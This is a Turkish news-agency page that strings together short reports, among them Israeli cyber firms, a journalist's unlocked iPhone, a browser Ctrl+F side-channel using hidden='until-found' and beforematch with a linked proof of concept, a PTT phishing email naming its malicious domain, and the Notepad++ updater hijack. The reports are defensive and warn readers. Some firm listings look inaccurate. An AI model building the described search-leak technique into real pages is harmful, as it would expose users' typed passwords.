“Dijital hizmet vergisi mevzuatı da dahil olmak üzere değişen mevzuat ortamı nedeniyle belirli yargı bölgelerinde reklam yayınlama ücretleri değişiyor. Bu ek masrafları şimdiye kadar Meta karşılamıştır.”

Şirket ayrıca düzenlemenin, yasal yükümlülüklere uyum ve sektörde oluşan yeni maliyet yapısına uygun hareket edilmesi amacıyla hayata geçirildiğini kaydetti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Gazeteciler ve Dijital Güvenlik

İsrail’de gözaltına alınan Türk gazeteci Emrah Çakmak, iPhone telefonunun şifresini paylaşmamasına rağmen cihazın açıldığını açıkladı. Bu olay, gazetecilerin dijital güvenliğinin ne kadar hassas bir konu olduğunu bir kez daha gösterdi. Söz konusu durum, yalnızca bireysel bir ihlal değil; devletlerin dijital cihazlara erişim kapasitesi ve sınırları hakkında daha geniş bir tartışmayı da tetikledi.

Benzer şekilde geçmişte Amerika Birleşik Devletleri'nde bazı basın mensuplarının telefonlarının hedefli siber saldırılarla ele geçirildiği ortaya çıkmıştır. Bu tür olaylar, gazetecilerin ve aktivistlerin gelişmiş gözetim teknolojilerinin hedefi olabileceğini göstermektedir.

Apple Ekosistemi ve İsrail Bağlantısı

Apple, yalnızca ABD merkezli bir şirket değildir; dünya genelinde önemli Ar-Ge merkezlerine sahiptir. İsrail’de özellikle Tel Aviv ve Hayfa gibi şehirlerde Apple mühendislik ve güvenlik araştırma merkezleri bulunmaktadır. Bu merkezler, işlemci tasarımı, güvenlik mimarileri ve donanım optimizasyonu gibi kritik alanlarda faaliyet göstermektedir.

Apple’ın İsrail’de yüzlerce mühendisi ve Ar-Ge personeli istihdam ettiği bilinmektedir. Özellikle güvenlik ve biyometrik sistemler üzerinde çalışan bu ekipler, iPhone ve diğer Apple cihazlarının donanım ve yazılım güvenliğini geliştirmede kilit rol oynar.

Apple’ın Satın Aldığı İsrailli Startup’lar

Apple, İsrail merkezli birçok startup’ı bünyesine katmıştır:

• PrimeSense – 3D sensör teknolojileri, Face ID altyapısının temeli

• Anobit – Flash depolama çözümleri, iPhone veri saklama performansı

• LinX Imaging – Çok lensli kamera sistemleri, iPhone kamera gelişimi

• RealFace – Yüz tanıma teknolojileri, biyometrik güvenlik

Bu startup’lar, doğrudan hackleme için değil, cihaz performansı ve kullanıcı deneyimi odaklı çalışmaktadır.

İsrailli Siber Güvenlik Firmaları ve Küresel Etkileri

İsrail, dünya çapında önde gelen bir siber güvenlik ekosistemine sahiptir. Birçok büyük teknoloji şirketi, İsrail merkezli firmaları veya Ar-Ge merkezlerini bünyesine katmıştır:

Örnek Alımları ve Bağlantıları:

• Alphabet (Google) – Wiz

• Palo Alto Networks – CyberArk, Talon Cyber Security, Dig Security

• Zscaler – Avalor

• Microsoft – Adallom

• Armis – Otorio

• Bitsight – Cybersixgill

• Cato Networks – Aim Security

• Continental AG – Argus Cyber Security (PlaxidityX)

• Okta – Axiom

Diğer İsrailli Şirketler ve Araştırma Merkezleri:

• 1Touch.io, AccSenSe, ACID Technologies, Actifile, CyberDB, L7 Defense, Deep Instinct, Certora, Beyond, Skybox Security, Valid Network, CrowdStrike, Coro, Silverfort, BioCatch, Riskified, Torq Built In, Claroty, CyberX Labs, Perception Point, Xinnor, Storm, Cyber DriveWare, Upstream-Security, Cyabra, Babacode, Dome9 Security, CYREBRO (platform), Cyber 72, Citadel Cyber Security, HUB Security, CyberSafe, Javelin Networks, NSO Group

İsrailli Siber Güvenlik Şirketleri (Genel Liste):

CyberArk, Wiz, Hudson Rock, Sasa Software, Perimeter 81, odix, C2A Security, Check Point Software Technologies, Cato Networks, Radware, Qualysec, Orca Security, Aqua, Transmit, Forter, Pentera, CyCognito, Hunters, torq, CYE, Cyera, BigID, Deep Instinct, Island, Axonius, Wing Security, Noma Security, Token Security, Gomboc, Descope, Astrix Security, Reco

Bu firmalar, hem ticari hem de devlet destekli siber güvenlik çözümleri geliştirmekte; özellikle zero-click ve hedefli saldırı araçları ile gündeme gelmektedir.

İsrailli Mühendislerin ve Eski Askerlerin Küresel Rolü

İsrail vatandaşları, özellikle askeri geçmişe sahip (Unit 8200, IDF Siber Savunma Müdürlüğü) kişiler, dünya çapındaki büyük teknoloji ve siber güvenlik firmalarında önemli roller üstlenmektedir:

• Microsoft, Palo Alto Networks, VMware: 1.400+ eski IDF mensubu, güvenlik ve mühendislik pozisyonları

• Meta (Facebook): Yüzlerce eski IDF subayı ve istihbarat mensubu, AI politika ve güvenlik pozisyonları

• Google, Microsoft: Eski istihbaratçılar üst düzey pozisyonlarda politika, güvenlik ve altyapı stratejilerini şekillendiriyor

Bu durum, İsrail’in siber yeteneklerinin küresel teknoloji ekosistemine entegrasyonunu gösterir.

Zero-Click Saldırılar ve Güvenlik Perspektifi

“Zero-click” saldırılar, hedef cihazın kullanıcının herhangi bir eylemine gerek kalmadan ele geçirilmesini sağlayan gelişmiş yöntemlerdir. Örnekler:

• NSO Group – Pegasus

• Candiru

• Diğer gelişmiş siber istihbarat araçları

Bu araçlar, yüksek maliyetli ve devlet destekli operasyonlar için tasarlanmıştır. Sıradan kullanıcıların kitlesel şekilde risk altında olması oldukça düşüktür.

Teknoloji, Güvenlik ve Algı

• iPhone’lar güçlü güvenlik sistemlerine sahiptir, ancak hedefli operasyonlarda zafiyetler kullanılabilir

• İsrail, hem teknoloji hem de siber güvenlik alanında global bir merkezdir

• Devlet destekli firmalar, istihbarat ve gözetim teknolojilerini geliştirir

• Eski asker ve istihbaratçılar, küresel teknoloji şirketlerinde kritik roller üstlenmektedir

Dolayısıyla, mesele cihazların tek başına kırılabilirliği değil; küresel teknoloji, siber güvenlik ve istihbarat dengelerinin kesişimidir.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Gözaltı Olayı
CNN Türk muhabiri Emrah Çakmak ve kameraman Halil Kahraman’ın İsrail’de gözaltına alındığı bilgisi üzerine açıklama yapan Duran, “Gazeteci arkadaşlarımızın bir an önce serbest bırakılması için gerekli girişimleri yapıyor ve konuyu hassasiyetle takip ediyoruz” dedi.

Gazetecilerden Bilgi
Gözaltına alınan Halil Kahraman, izin alarak telefonundan son durumu hakkında bilgi verdi. Kahraman, sağlık durumlarının iyi olduğunu, telefonlarına el konulduğunu ve gözaltında tutulduklarını bildirdi. İsrail’in bu usulsüz müdahalesine peş peşe tepkiler geldi.

Diplomatik Girişimler
Açıklamada, Türkiye Cumhuriyeti’nin diplomatik kanallar aracılığıyla gazetecilerin serbest bırakılması için çalıştığı ve olayın takip edildiği vurgulandı. Basın özgürlüğüne ilişkin hassasiyetin korunduğu belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Hedefler ve Operasyonlar
Pakistan hava ve kara operasyonlarıyla Kabil, Kandahar ve Paktia’daki Taliban ve silahlı gruplara yönelik hedefleri vurdu. Afganistan tarafı ise sınır hattında karşı saldırılar düzenledi. Yetkililer, farklı rakamlarla asker ve sivil kayıplarını açıkladı.

Siyasi ve Diplomatik Gelişmeler
Durand Hattı’nın kabul edilmemesi ve 2025’te başarısız olan arabuluculuk girişimleri, çatışmanın sürmesinde etkili oldu. BM, ABD, Çin ve bölge ülkeleri diplomatik çözüm çağrıları yaparken resmi bir ateşkes adımı hâlen atılmadı.

Sivil Halk Etkileniyor
Kabil ve sınır bölgelerinde yaşayan sivil halk yoğun risk altında bulunuyor. Yetkililer, “Savaş nedeniyle yerlerinden edilen vatandaş sayısı hızla artıyor” bilgisini paylaştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Genel kurulda divan süreci işletilirken, yeni dönem hedefleri, derneğin yürüttüğü sosyal-kültürel faaliyetler, kadın ve gençlik yapılanması, dijital arşiv çalışmaları ile Orta ilçesine dair gündem başlıkları öne çıktı. Konuşmalarda “birlik ve beraberlik” vurgusu öne çıkarken, salonun en sık tekrarlanan çağrısı “katılımın artması” oldu.

Ortalılar Derneği Başkanı Yunus Yarımkaya: “Birlikte daha güzel işler başaracağımıza yürekten inanıyoruz.”
Derneğin açılış konuşmasını yapan Yunus Yarımkaya, genel kurula katılan hemşerilere teşekkür ederek, “Katılımınız ve desteğiniz bizler için çok kıymetlidir.” dedi. Yarımkaya, derneğin dayanışma ve gönüllülük temelinde çalışmalarını sürdürdüğünü belirterek, “Birlikte daha güzel işler başaracağımıza yürekten inanıyoruz.” ifadesini kullandı.

Ortalılar Derneği Yönetim Kurulu Üyesi Hamdi Canbaz: “Vizyonumuz kültürümüzü kuşaktan kuşağa aktarmak.”
Genel kurul akışında söz alan yönetim kurulu üyesi Hamdi Canbaz, derneğin vizyon, misyon ve temel ilkelerine ilişkin sunum yaptı. Canbaz, “Kaybolmaya yüz tutmuş kültürel değerlerimizi kayıt altına almak” hedefini vurgulayarak, şeffaflık ve denetlenebilirlik ilkesine önem verdiklerini söyledi.

Sunumda derneğin dijital platformlarına da değinen Canbaz, web sitesinin yeniden hayata geçirildiğini, faaliyet videolarının YouTube kanalına aktarıldığını, duyurular için SMS altyapısı kurulduğunu belirtti. Canbaz, dijital arşivi “dijital kütüphane” hedefiyle tanımlayarak, hemşerilerden kültürel materyal desteği istedi.

Çankırı MÜSİAD Başkanı Mehmet Güneş: “Dernekçi hem zamanını hem parasını harcar ama kıymeti olmaz.”
Genel kurulda konuşan Çankırı MÜSİAD Başkanı Mehmet Güneş, dernekçiliğin zor ve emek isteyen bir alan olduğunu söyledi. Güneş, “Dernekçi hem zamanını hem parasını harcar ama kıymeti olmaz.” diyerek, sivil toplumun sosyal hayattaki rolüne dikkat çekti.

Mehmet Güneş, Yunus Yarımkaya ile uzun yıllara dayanan dostluğa işaret ederek, derneğin “görünür olmasa bile hayırlı işlere imza attığını” ifade etti. Derneklerin yalnızca toplantılarla sınırlı kalmaması gerektiğini belirten Güneş, “Derneklerin daha hayırlı işlere, daha iyi projelere el atması” çağrısı yaptı.

Sincan Çankırılılar Dernek Başkanı Süleyman Abacı: “Çalışmaları takdir ediyoruz, yeni yönetime hayırlı olsun.”
Toplantıda söz alan Sincan Çankırılılar Dernek Başkanı Süleyman Abacı, genel kurulun hayırlara vesile olmasını dileyerek, “Yunus başkanımızın çalışmaları takdire şayan.” dedi. Abacı, yeni yönetime başarı dileklerini iletti.

Kayıköyü Dernek Başkanı Bekir Aktaş: “Dernekçilik gönüllere dokunma işidir.”
Kayıköyü Dernek Başkanı Bekir Aktaş, dernekçiliği “gönül işi” olarak tanımladı. Aktaş, “Burada hiçbir dernek başkanının maddiyatla işi yok.” diyerek, hemşeriler arasında bağ kurmanın önemini vurguladı.

Bekir Aktaş, konuşmasında ayrıca aile içinde yaşanan bir sağlık sürecine ilişkin duyarlılık çağrısı yaptı. Aktaş, toplumsal dayanışmanın ihtiyaç anlarında daha görünür olduğunu belirterek, “Bu konuda hep duyarlı olalım.” ifadesini kullandı.

AK Parti Keçiören İlçe Başkan Yardımcısı Erdal Çakıroğlu: “Toplantınız hayırlı olsun, birlik tablosu kıymetlidir.”
Programda konuşan AK Parti Keçiören İlçe Başkan Yardımcısı Erdal Çakıroğlu, genel kurulun hayırlı olması temennisini paylaştı. Çakıroğlu, dernek çalışmalarının “güzel insanları bir araya getirmesi” yönüne işaret ederek, toplantı için “Cenab-ı Allah hayırlı etsin.” dedi.

Ortalı iş insanı Yakup Kalaycı: “Genel kurulumuzun hayırlı olmasını diliyorum.”
Genel kurulda söz alan Ortalı iş insanı Yakup Kalaycı, kahvaltı programı ve genel kurulun hayırlı olması temennisinde bulundu. Kalaycı, yeni yönetime başarı dileyerek hemşerilerle bir arada olmanın önemini vurguladı.

Ankara Çankırılılar Federasyonu Başkanı Kamil Karakuş: “Sayılar değil, samimiyet önemlidir.”
Ankara Çankırılılar Federasyonu Başkanı Kamil Karakuş, konuşmasında sivil toplumun etkisine dikkat çekti. Karakuş, “Sayıların çokluğu önemli değil, sayılar samimiyeti çok önemli.” diyerek, derneklerin ürettiği emeğin belirleyici olduğunu söyledi.

Karakuş, Ortalılar Derneği’nin kültürel faaliyetlerinin “gönüllerde” yer ettiğini belirterek, yeni yönetime tebriklerini iletti. Karakuş, “Birlik ve beraberliğimiz daim olsun.” ifadelerini kullandı.

Ankara Çankırılılar Dernek Başkanı Satılmış Kovancı: “Yeni yönetime hayırlı işler diliyorum.”
Ankara Çankırılılar Dernek Başkanı Satılmış Kovancı, toplantının hayırlı olmasını dileyerek, Yunus Yarımkaya ve yeni yönetime başarı temennisinde bulundu. Kovancı, programın hemşerileri bir araya getiren bir buluşma olduğunu söyledi.

Ortalılar Derneği Yönetim Kurulu Üyesi Niyazi Canbaz: “Bir işi gönülden yaparsak dağlar duramaz.”
Genel kurulda söz alan yönetim kurulu üyesi Niyazi Canbaz, hemşerilerin bir araya gelmesini “gönül işi” olarak tanımladı. Canbaz, “Bir işi gönülden yaparsak karşımızda dağlar böyle duramaz.” dedi.

Niyazi Canbaz, dernek, federasyon ve köy dernekleriyle birlikte yürütülen çalışmaların ortak emekle büyüdüğünü belirterek, hedeflerinin “memlekete değer katmak” olduğunu söyledi.

Orta MHP İlçe Başkanı Ahmet Denizhan: “İlçemiz için elimizden gelen her desteği vereceğiz.”
Genel kurulda protokol konuşması yapan Orta MHP İlçe Başkanı Ahmet Denizhan, toplantının ilçeye, köylere ve memlekete hayırlı olmasını diledi. Denizhan, derneklerin gurbet elde hemşerileri bir araya getiren yapılar olduğuna işaret ederek, “Bu dönem Yunus Yarımkaya başkanımızın arkasındayız.” dedi.

Ahmet Denizhan, Orta Belediyesi adına da destek mesajı verdiğini belirterek, dernek faaliyetlerinin tanışma ve kaynaşmayı güçlendirdiğini ifade etti.

Ortalılar Derneği Başkanı Yunus Yarımkaya: “Hemşerilerde bir yorgunluk var, bunu görüyoruz.”
Genel kurulun kapanış bölümünde yeniden kürsüye çıkan Yunus Yarımkaya, katılımın önceki dönemlere göre azalmasına ilişkin değerlendirmelerde bulundu. Yarımkaya, “Hemşerilerimizde bir yorgunluk var.” diyerek, program yoğunluğunun etkisine işaret etti.

Yarımkaya, 2024 yılında yaşanan ve kamuoyuna yansıyan bir tartışma sürecine de değinerek, konunun yapılan görüşmelerle netleştiğini söyledi. Yarımkaya, genel kurul konuşmasını “samimiyet ve güven” vurgusuyla sürdürdü.

Ortalılar Derneği Başkanı Yunus Yarımkaya: “Katılım meyvedir, siz isterseniz biz varız.”
Kapanışın devamında katılım çağrısını tekrarlayan Yunus Yarımkaya, “Katılım bizim yaptığımız programların meyvesi.” diyerek, hemşeriler salonda oldukça motivasyonlarının arttığını vurguladı. Yarımkaya, “Siz talep edin, biz yapmaya hazırız.” sözleriyle yeni dönem çalışma iradesini dile getirdi.

Yunus Yarımkaya, dernek buluşmalarının “tanışma ve kaynaşma” amacı taşıdığını belirterek, kahvaltı programlarını yeniden başlatma hedefinden söz etti. Yarımkaya ayrıca, 14 Mart’ta yapılması planlanan iftar buluşması için de davet çağrısını yineledi.

Ortalılar Derneği Divan Başkanı Osman Canbaz: “Daha çok gezi ve etkinlik bekliyoruz.”
Divan Başkanı Osman Canbaz, dilek ve temenniler bölümünde yeni dönem beklentilerini paylaştı. Canbaz, “Daha çok geziler, kültür gezileri, dini geziler, daha çok etkinlikler bekliyoruz.” diyerek, derneğin faaliyet takviminin güçlendirilmesini istedi.

Osman Canbaz, kadın kollarının organizasyon yüküne verdiği katkıya da teşekkür ederek, çalışmalarda “ortak emek” vurgusu yaptı.

CUMHA Muhabiri Tahsin Bastama’nın Özel Röportajları
Protokol konuşmalarının ardından CUMHA muhabiri Tahsin Bastama, dernek yöneticileri ve konuklarla genel kurul gündemini, dernek faaliyetlerini ve Orta ilçesine dair başlıkları ele alan röportajlar gerçekleştirdi.

Ortalılar Derneği Başkanı Yunus Yarımkaya: “Manevi destek olmadan bu yük taşınmıyor.”
Genel kurul sonrası değerlendirmesinde Yunus Yarımkaya, hemşerilerden en büyük beklentilerinin “manevi destek” olduğunu söyledi. Yarımkaya, “Maddiyat bir şekilde aşılır ama maneviyatta bütün dernekler zorlanıyor.” diyerek, programlara katılımın motivasyon ürettiğini ifade etti.

Ortalılar Derneği Başkanı Yunus Yarımkaya: “İftar, kültür turları ve umreyle hemşerileri bir araya getiriyoruz.”
Yarımkaya, derneğin yıllık faaliyet planına ilişkin başlıklarda iftar buluşmaları, kültür turları ve şehir ziyaretlerini anlattı. Umre organizasyonlarına da değinen Yarımkaya, “Kaliteden taviz vermeden… mümkün olduğu kadar maddi külfete sokmayacak programları tercih ediyoruz.” dedi.

Ortalılar Derneği Başkanı Yunus Yarımkaya: “Kadın kolları yükümüzü hafifletti, gençlik kollarını kuracağız.”
Yarımkaya, kadın kollarının günbirlik turlar ve buluşmalarla derneğin yükünü paylaştığını belirterek, “Kadın kollarımız yükümüzü biraz daha hafifletmiş oldu.” dedi. Gençlik kolları hedefini de paylaşan Yarımkaya, gençlerin güncel şartlarda zorlandığını, buna rağmen kaynaşmayı artıracak programlar için çalışacaklarını ifade etti.

Ortalılar Derneği Başkanı Yunus Yarımkaya: “Ağaç dalıyla gürler, katılım gücümüzdür.”
Yarımkaya, genel kurullara katılım anlayışına dair eleştirisini “rakip varsa gelirim” yaklaşımı üzerinden dile getirdi. Yarımkaya, asıl amacın “selamlaşmak, hatırlamak ve güçlü görünmek” olduğunu vurgulayarak, “Ağaç dalıyla gürler.” benzetmesini yaptı.

Ortalılar Derneği Başkanı Yunus Yarımkaya: “Bürokratlarımız elimiz ayağımız, sahip çıkalım.”
Yunus Yarımkaya, temsil ve bürokrasi başlığında Pursaklar, Keçiören ve Ankara genelindeki temsil eksiklerine dikkat çekti. Yarımkaya, “Bürokratlarımız elimiz ayağımız.” diyerek, hemşerilerin bürokraside görünür olması gerektiğini savundu ve “Bürokratlarımız yoksa Çankırı’mız yok.” ifadelerini kullandı.

Ortalılar Derneği Yönetim Kurulu Üyesi Emekli Tarih Öğretmeni Hamdi Canbaz: “Kültürümüz kaybolmasın diye belge okuyoruz.”
CUMHA’ya konuşan Hamdi Canbaz, Orta ilçesine ilişkin Osmanlı arşiv belgeleri, nüfus sayım defterleri ve kadı sicilleri üzerine yürüttükleri çalışmaları anlattı. Canbaz, “Orta ilçesine ait Osmanlı arşivlerinde yer alan belgelerin transkripsiyonu, çevirisini ve yorumlamasını yaptım.” dedi.

Canbaz, “Biz kimiz, nereden geldik?” sorusuna arşiv belgeleriyle somut cevap üretmeye çalıştıklarını belirterek, yayınların gelecek kuşaklara aktarım açısından önem taşıdığını vurguladı. Canbaz, bu çalışmaların “kayıt altına alma” niteliğine dikkat çekti.

Ortalılar Derneği Kadın Kolları Başkanı Emekli Sınıf Öğretmeni Hamide Canbaz: “Kadınlarımıza yönelik faaliyetleri artıracağız.”
Hamide Canbaz, kadın kollarının iki yıllık çalışmasına ilişkin değerlendirmesinde, anneler günü programları, Ilgaz ve Kapadokya gezileri, kadın buluşmaları, tiyatro etkinlikleri ile sosyal dayanışma ziyaretlerini anlattı. Canbaz, “Kadınlarımızla birlikte güzel etkinlikler yapacağız.” dedi.

Ortalılar Derneği Kadın Kolları Başkanı Hamide Canbaz: “Kadınlar yönetimde daha fazla yer almalı.”
Röportajın devamında kadın temsili başlığına değinen Canbaz, “Keşke bütün yönetimde yarısı kadın yarısı erkek olsaydı.” diyerek, karar alma süreçlerinde kadınların daha görünür olması gerektiğini söyledi. Canbaz, “Erkek egemenliği olan bir toplumda yaşıyoruz, bu yüzden kadın kollarının olması çok önemli.” ifadelerini kullandı.

Orta MHP İlçe Başkanı Ahmet Denizhan: “OSB tamamlanınca yatırımların önü açıldı.”
CUMHA’ya konuşan Ahmet Denizhan, Orta ilçesinde organize sanayi bölgesinin tamamlanmasıyla yatırımların hızlandığını söyledi. Denizhan, altyapı ve yol çalışmalarına ilişkin değerlendirmeler yaparak, yatırım süreçlerine dair beklentileri paylaştı.

Orta MHP İlçe Başkanı Ahmet Denizhan: “Hangi görüşte olursak olalım hepimiz Ortalıyız.”
Denizhan, röportajın devamında birlik ve beraberlik vurgusu yaparak, “Hangi görüşte olursak olalım Ortalıyız.” dedi. Denizhan, ilçedeki projeler ve devam eden otoban çalışmalarıyla ilgili iddialara da yanıt verdiğini belirterek, çalışmaların sürdüğünü ifade etti.

Genel kurulun sonunda yapılan konuşmalarda ortak başlık “katılımın artması” ve “hemşeri dayanışmasının güçlenmesi” oldu. Toplantıda dile getirilen çağrılar, yaklaşan iftar buluşması ve dönem boyunca yapılması planlanan sosyal-kültürel etkinlikler üzerinden yeniden yinelendi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Adalet Bakanlığında Devir Teslim
Karara göre, görevden affını isteyen ve talebi kabul edilen Yılmaz Tunç’tan boşalan Adalet Bakanlığı görevine Akın Gürlek atandı. Atama, Türkiye Cumhuriyeti Anayasasının 104’üncü ve 106’ncı maddeleri uyarınca gerçekleştirildi.

İçişleri Bakanlığına Yeni Atama
Aynı karar kapsamında, Ali Yerlikaya’dan boşalan İçişleri Bakanlığı görevine Mustafa Çiftçi getirildi. Atamanın, Cumhurbaşkanının anayasal yetkileri çerçevesinde yapıldığı bildirildi.

Atama kararları, 10 Şubat 2026 tarihini taşıyan Cumhurbaşkanı Recep Tayyip Erdoğan imzasıyla Resmî Gazete’de yer aldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ctrl F Yapıldığında DOM Sessiz Kalmıyor
hidden="until-found" ile gizlenen içerikler normal şartlarda görünmez durumda kalıyor. Ancak sayfa içi arama sırasında eşleşme oluştuğunda, tarayıcı bu elementleri geçici olarak görünür hâle getiriyor. Bu aşamada tetiklenen beforematch adlı DOM olayı, JavaScript tarafından dinlenebiliyor ve kullanıcı aramasına dair dolaylı bilgiler üretebiliyor.

Karakter Karakter Çözümlenebilen Arama
Teknik incelemede, sayfaya eklenen binlerce gizli HTML elementinin olası karakter dizilerini temsil ettiği belirtiliyor. Kullanıcı Ctrl+F alanına bir karakter yazdığında, yalnızca eşleşen element için beforematch olayı tetikleniyor. Bu zincirleme yapı sayesinde, klavye dinlemesi yapılmadan kullanıcının arama girdisinin adım adım tahmin edilebildiği ifade ediliyor. Bu yöntem, klasik anlamda bir side‑channel olarak tanımlanıyor.

Parola Sızıntı Siteleri İçin Kritik Senaryo
Uzmanlar, bu tekniğin özellikle “parolanız sızdırıldı mı” iddiasıyla hizmet veren siteler açısından ciddi bir risk barındırdığına dikkat çekiyor. Kullanıcının mevcut parolasını bu tür sitelere yazması hâlinde, sayfa içinde yer alan hidden="until-found" elementleri aracılığıyla parolanın kısmen bile olsa sızdırılabilmesi teorik olarak mümkün görülüyor. Bu durum, kullanıcı parolayı kendi rızasıyla girmiş olsa bile ek bir gizlilik tehdidi oluşturuyor.

Teknik Çalışmanın Kaynağı ve Türkçe Yayın
Söz konusu riskin pratikte nasıl çalıştığı, uluslararası güvenlik araştırmaları kapsamında daha önce ortaya konulan teknik bir yöntem üzerinden gösteriliyor. Bu çalışmayı derleyerek Türkçeleştiren ve kamuoyuna haberleştiren isim ise siber güvenlik araştırmacısı Ebubekir Bastama oldu. Bastama’nın internet sitesinde yayımlanan içerikte, hidden="until-found" ve beforematch kombinasyonunun Ctrl+F girdilerini nasıl dolaylı biçimde açığa çıkarabildiği ayrıntılı şekilde aktarılıyor.

Test Edilebilen PoC Adresi
Yayımlanan çalışmada, yöntemin teorik anlatımla sınırlı kalmadığına dikkat çekiliyor. Kullanıcılar ve geliştiriciler, ilgili davranışı doğrudan test edebilmek için hazırlanan PoC’ye şu adres üzerinden erişebiliyor: https://ebubekirbastama.com.tr/ctrl-f-until-found-side-channel-poc.html

Boşluklar Bile Atlanmıyor
Analizde, Ctrl+F indekslemesinde boşluk karakterlerinin tek başına algılanmaması nedeniyle Zero‑Width Space (\u200B) gibi görünmez karakterlerin kullanıldığı aktarılıyor. Bu sayede, boşluk içeren kelime ve parola dizilerinin de tarayıcı tarafından indekslenebildiği belirtiliyor.

Hızlı Yazımda Özellikle PC’lerde Çalışmıyor
Çalışmada özellikle masaüstü bilgisayarlara vurgu yapılıyor. Ctrl+F alanına karakterlerin çok hızlı yazılması veya metnin yapıştırılması durumunda, tarayıcıların performans optimizasyonları nedeniyle bazı DOM taramalarını atladığı belirtiliyor. Bu senaryolarda beforematch olayının tetiklenmediği ve algılamanın çalışmadığı ifade ediliyor. Uzmanlar, bunun JavaScript kaynaklı bir hata değil, bilinçli bir tarayıcı davranışı olduğunun altını çiziyor.

Tarayıcı Güvenliği Yeniden Gündemde
Uzman görüşlerinde, beforematch olayının JavaScript erişimine kapatılması, hidden="until-found" elementlerinin gözlemlenemez hâle getirilmesi ya da Ctrl+F indekslemesinin DOM olayı üretmeden çalışması gibi önlemlerin değerlendirilmesi gerektiği belirtiliyor. Kullanıcı deneyimi için eklenen her yeni tarayıcı özelliğinin, gizlilik ve veri güvenliği açısından yeniden ele alınması gerektiği vurgulanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Şüpheli Link Detayı Ortaya Çıktı
Sahte e-postada yer alan “Ödemeyi Tamamla” butonuna tıklayan kullanıcıların, i6ome8hbb.cc.rs6.net uzantılı, PTT ile hiçbir bağlantısı bulunmayan bir adrese yönlendirildiği tespit edildi. Bağlantının, Constant Contact altyapısı üzerinden gizlenmiş şekilde sunulduğu ve kullanıcıyı sahte ödeme sayfasına yönlendirmeyi amaçladığı ifade ediliyor.

Yurt Dışı Kaynaklı Adresler Alarm Veriyor
E-postanın gönderici adresinde “info-santedicola.com@shared1.ccsend.com” ibaresinin yer aldığı, mesajın alt bölümünde ise ABD’ye ait açık adres bilgilerinin bulunduğu görüldü. Siber güvenlik uzmanları, bu tür yurt dışı kaynaklı ve kurumsal görünümlü adreslerin, oltalama saldırılarında sıkça kullanıldığını vurguluyor.

Amaç Kredi Kartı ve Kişisel Veriler
Uzmanlara göre sahte bağlantı üzerinden açılan sayfalarda kredi kartı bilgileri, kimlik verileri ve banka bilgileri hedef alınıyor. Girilen bilgilerin anlık olarak dolandırıcıların eline geçtiği ve kartlardan izinsiz harcamalar yapıldığı bildiriliyor.

PTT’nin Uygulamalarıyla Örtüşmüyor
PTT’nin resmî uygulamalarında gümrük vergisi bildirimlerinin e-posta yoluyla ve üçüncü taraf bağlantılar üzerinden yapılmadığı belirtiliyor. Kurumun, ödemelerin yalnızca resmî internet sitesi, e-Devlet ve PTT şubeleri aracılığıyla gerçekleştirildiğini daha önce kamuoyuna duyurduğu hatırlatılıyor.

Yetkililerden Vatandaşa Uyarı
Siber güvenlik uzmanları, bu tür e-postaların kesinlikle açılmaması, bağlantılara tıklanmaması ve ödeme bilgisi girilmemesi gerektiğini vurguluyor. Şüpheli mesajların BTK ve ilgili resmi platformlara bildirilmesi çağrısı yapılıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Güncelleme Trafiği Saldırganların Kontrolüne Geçti
Paylaşılan bilgilere göre, Haziran 2025 ile 2 Aralık 2025 tarihleri arasında Notepad++’ın güncelleme mekanizması olan WinGUp üzerinden gerçekleşen trafik, saldırganlar tarafından kontrol edilen sunuculara yönlendirildi. Bu süreçte, kullanıcılara resmi güncelleme izlenimi veren zararlı yazılım içeren sahte paketler gönderildiği belirtildi.

“Hedefli ve Seçici Bir Operasyon”
Onur Oktay, saldırının geniş kitleleri kapsayan rastgele bir girişim olmadığını vurgulayarak, “Bu operasyon herkese açık bir saldırı değildi. Belirli IP blokları veya coğrafi bölgelerdeki kullanıcılar hedef alındı.” ifadelerini kullandı. Elde edilen bulguların, saldırının Çin devlet destekli bir APT grubu tarafından yürütüldüğüne işaret ettiği aktarıldı.

Zafiyet Kaynak Kodda Değil Güncelleyicide
Oktay’ın değerlendirmesine göre, Notepad++’ın kaynak kodunda herhangi bir güvenlik açığı tespit edilmedi. Ancak WinGUp aracının, indirilen dosyaların dijital imza ve sertifika doğrulamasını yeterince sıkı yapmaması, saldırının başarıya ulaşmasına neden oldu. Hosting seviyesinde gerçekleştirilen Man-in-the-Middle yönlendirmesiyle sahte güncellemeler meşru kabul edildi.

Alınan Önlemler ve Yeni Sürüm
Olayın ardından Notepad++ tarafında hosting sağlayıcısı değiştirildi, tüm erişim bilgileri sıfırlandı ve v8.8.9 sürümü yayımlandı. Bu sürümle birlikte güncelleyicinin, indirilen paketlerin imza ve sertifikalarını zorunlu olarak kontrol ettiği, doğrulama başarısız olursa güncellemenin iptal edildiği kaydedildi.

Kullanıcılara Güvenlik Uyarısı
Saldırının hedefe özel zararlı yazılımlar içermesi nedeniyle tek bir dosya imzası bulunmadığına dikkat çekildi. Şüpheli ağ trafiği ve %TEMP% klasöründe Notepad++ imzası taşımayan çalıştırılabilir dosyalar, olası bulaş göstergeleri arasında yer aldı. Onur Oktay, v8.8.9 öncesi sürümleri kullananların uygulama içinden güncelleme yapmaması ve ilgili dönemde güncelleme alan sistemlerin EDR veya antivirüs çözümleriyle taranması gerektiğini belirtti.

Yeni Güvenlik Katmanları Geliyor
Geliştirici ekip tarafından, ilerleyen sürümlerde XML dijital imzalama (XMLDSig) desteğinin devreye alınacağı duyuruldu. Olayın, yazılım güvenliği kadar altyapı güvenliğinin de kritik önemde olduğunu bir kez daha ortaya koyduğu ifade edildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

1996 Kuruluş Ruhundan İlham Alan Yapı
Turknet tarafından yapılan açıklamada, “GigaCrew yalnızca kısa vadeli bir kampanya değil, Turknet topluluğuyla sürdürülebilir ve uzun vadeli bir bağ kurmayı hedefleyen bir yapı.” ifadelerine yer verildi. Programın, Z kuşağı başta olmak üzere teknoloji meraklıları, içerik üreticileri ve dijital dünyada aktif olan geniş bir kitleye hitap ettiği belirtildi.

Elçilere 12 Aylık Gelişim ve Ödül Yolculuğu
